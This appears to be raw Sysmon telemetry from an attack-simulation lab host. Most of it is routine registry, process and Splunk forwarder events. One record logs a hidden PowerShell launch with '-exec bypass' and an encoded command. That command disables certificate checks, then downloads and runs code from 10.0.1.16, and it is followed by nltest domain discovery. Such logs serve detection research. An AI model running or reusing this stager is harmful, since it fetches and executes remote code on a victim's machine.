(0x01d7a5a6-0x9fd57a05) 13241300x800000000000000035085265Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:15:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a5af-0x0199e205) 13241300x800000000000000035085264Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:15:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000035085263Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:15:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x71837ade) 
18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085307Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085306Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085305Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085304Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085303Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:18.124{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035085334Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:43.701{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56718-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085333Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:19.276{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17ECB297E72D7346CBE23D0BF49998BC,SHA256=D4B52CDA812867C52A8F7A1A5A12FC6B91B653588697B958DBB6DD5034D81457,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085332Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:19.276{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=26931B0B864DA04F09514488678E5AC2,SHA256=867C183D8A0B23EC196AE71C1F37E372541776DD627DEEB4F58AA1053AD798EF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085335Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:20.355{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27B99D046F5162134C8889B36CDA8A6A,SHA256=10B4DB90FB3AF3CF278EA883A4C4089B0D3C83C195626A04C5CFF1E6B55D4B2D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085336Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:21.374{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EE934C4E95586BE345CAA5511E6A698,SHA256=97A5787F1A5E5B8E05E464B9E371D7CCCDFCE09E77EE030018CC4AAB1022C8B1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085337Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:22.389{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E117E2D7E9B9A20C4C0488BEBD9CFAC1,SHA256=E71AA65E1E46590B07557AD92C84434ED81B693096567182FB8D6AB1630C8162,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085339Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:23.753{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=079FF44268692FBE79B781CC03BBEDA8,SHA256=F1BEB6EDA81933D3968680989547E52112FE398FA6CF3EAA435FC66BD8448BFD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085338Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:23.419{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED14D7AF771179B6BA537C0ECAA762B1,SHA256=4A52C2C4F7E38ED36CD4C4633557479EBAF0C32502F88BF12914291F144FB3B2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035085341Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:24.454{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98C4EB9A607BEE39FFA2BF3A2E794F46,SHA256=46BA0F63E27C20FD71E3C06857683052E6FB5FC9E7C831B33A14830C77215832,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085340Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:48.112{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56719-false10.0.1.12-8000- 23542300x800000000000000035085343Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:25.473{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FAF71544816565AE012F30EA0C4A526,SHA256=1F701B9455BDBAC741D6BEEAA3929906010D7A7075CF785AB779380768260CEC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085342Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:48.712{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56720-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085344Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:26.488{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED1A44CC19D9F7BF20D0FE187B2BD0D6,SHA256=34164589D951F686F9746F94295C20B9A95ED90623F6B20BDB3886C7AACD2C18,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085353Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:27.787{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-4F3F-613A-5F90-03000000C801}3800C:\Windows\system32\nltest.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085352Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:27.787{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085351Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:27.787{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085350Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:27.787{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085349Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:27.787{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:27.787{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-4F3F-613A-5F90-03000000C801}3800C:\Windows\system32\nltest.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:15:27.787{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-4F3F-613A-5F90-03000000C801}3800C:\Windows\system32\nltest.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7
\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035085346Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:27.797{B81B27B7-4F3F-613A-5F90-03000000C801}3800C:\Windows\System32\nltest.exe10.0.14393.4283 (rs1_release.210303-1802)Microsoft® Logon Server Test UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationnltestrk.exe"C:\Windows\system32\nltest.exe" 
/dsgetdc:C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=1171BC1F016201B83E30634121BA2A40,SHA256=8DB95007AC3DD96C487C0CC477BD89A6282D6F0949EBCECBBDA4F8D37C2A959C,IMPHASH=4C049D80BB0FE7E8B0688666FFF88442{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000035085345Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:27.534{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89B90F06EE7933221F91DD06BF07D24B,SHA256=D8ECA94595D7595C3FB2AB601101803ED6C3E786A57F0D6EB7A8816D26770114,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085374Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.803{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F40-613A-6190-03000000C801}2628C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035085373Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.803{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=388D62163830976628E443B4D31EAB32,SHA256=4532C9ED63A0B1709FF2A4B382B1C438A21B0EF821C8F73E19E929B9F5532C88,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085372Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.803{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0EF1D6A8C1C69FB4DDD5E62C747D94C6,SHA256=16FFC291A0CF1C55DADDBB6870EF94F0E59364AACB6ABA1479BCC21E96F70EDC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085371Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:28.803{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5D7C73A63035778BC9C6ADF6D2E8EF6C,SHA256=9CF82C9D92D6EBE527D251DF191299220859B9C77CA6955D1DFB9CCFB4D2F93C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085370Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
